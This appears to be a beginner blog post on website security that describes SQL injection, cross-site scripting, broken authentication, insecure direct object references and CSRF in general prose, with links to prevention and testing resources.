Security is of the major concern when we talk about the website administration. Every year a number of websites are being hacked and misused by the malicious elements. So, it is very important to get some security education even if you are a nontechnical blogger or small business who doesn’t like to get into the details of technical things.

 

Why do you need to know about security?

You can think of it as getting CCTV cameras installed in your supermarket. You might not be a big fan of these cameras but when getting them installed, you make sure to have at least the relevant technical information that can help you gain the intended benefits of these cameras and make sure that no malicious element tries to interfere with them.

In the same way, it is wise to gain the basic knowledge of security attacks and vulnerabilities that can compromise the safety of your site. So we are starting this series of site security issues for the Beginners.
 

In the first series we would talk about the major types of web security issues:

SQL Injection

SQL Injection ranks top in the most common security vulnerabilities. In SQL Injection the attacker makes its way to the mission-critical content of your database and corrupts it.

By SQL Injection the attackers are enabled to execute SQL statements in order to meet their vested interests. SQL statements are capable of controlling the backend database server, identifying and misusing the vulnerable points allows the attackers to evade the security and authorization measures and directly access the SQL database and interfere with the same like adding, deleting, editing, etc.

Post-execution the attacker can tweak, distort, create, change or even delete your vital backend data that can do immense harm to your business.

A popular and easy to understand example of SQL Injections is Union Based SQL injection that employs UNION operator enabling that attacker to wisely unite at least 2 SELECT statements to reach to a single output.





What is the best tool to prevent SQL Injection attacks?

You can use general SQL Parser to prevent SQL injection attacks

Here is the URL: http://www.sqlparser.com/

 

CROSS SITE SCRIPTING (XSS)

Popular in the technical fraternity as XSS, the web application output is corrupted by injecting JavaScript or similar client-side script into it. It is also one of the common security vulnerabilities in web applications. By manipulating client-side scripts the attackers can execute the web application in the desired manner.

 

How XSS can affect your site?

It allows the attackers to change website content or redirect visitors to objectionable sites. In many cases, it also enables the attackers to eavesdrop on user sessions or Hijack them. All these activities are facilitated by executing scripts in the browser.

 

What are the best tools to prevent Cross Site Scripting (XSS)?

These tools can provide decent protection against XSS attack: https://www.veracode.com/security/cross-site-scripting-prevention  

Broken Authentication & Session Management

Identity management and maintenance play a vital role in determining the privacy and hefty. However, broken authentication/session management can expose users to a number of site security issues.

Failing to offer 24X7 strong protections to login credentials/session management creates many loopholes making a clear highway for smart hackers to intrude into the active session and take unrestricted control by masquerading himself as a user that tricks the system to him as the original user.

 

 

Is there any tool to prevent Broken Authentication and Session Management?

One of the trusted tools for checking vulnerabilities is

https://hdivsecurity.com/owasp-broken-authentication-and-session-management

Insecure Direct Object References

A direct reference in the application URL that relates to the identity of database records/keys, directories, file or other internal implementation objects that works as a key for the hackers. Using the reference as a solid link the shrewd hackers can manage to reach the crucial user data and misuse it. 

 

How can I test for Insecure Direct Object References?

You can find the details on testing for your vulnerabilities to this type of attack by visiting the link below:

https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_Refer... (OTG-AUTHZ-004)

 

What is Cross-Site Request Forgery (CSRF)?

In CSRF the users are misled to perform unintended action by using a third-party website. This website communicates with the web application information that the user has an authentication when in reality he doesn’t have.

It enables the attackers to function through the authenticated browser of the user. Social media, online banking and in browse email clients are among the key targets of this attack. 

 

Is there any tool to check CSRF vulnerability?

You can check if you are vulnerable to CSRF by using this tool

URL: http://www.owasp.org/index.php/Category:OWASP_CSRFTester_Project

 

Conclusion

In order to keep your site safe and secured against the attackers, it is important to have the basic knowledge of site security issues. So, we have started a series of Site Security for the Beginners where we will regularly discuss various issues that can affect the security of your site like common web server vulnerabilities and the tools to prevent them. In the first series of this, we have discussed the common web application vulnerabilities and attacks and a brief introduction on how are they conducted. In our next series, we will discuss the best tips, tricks, and tools to steer clear of these attacks.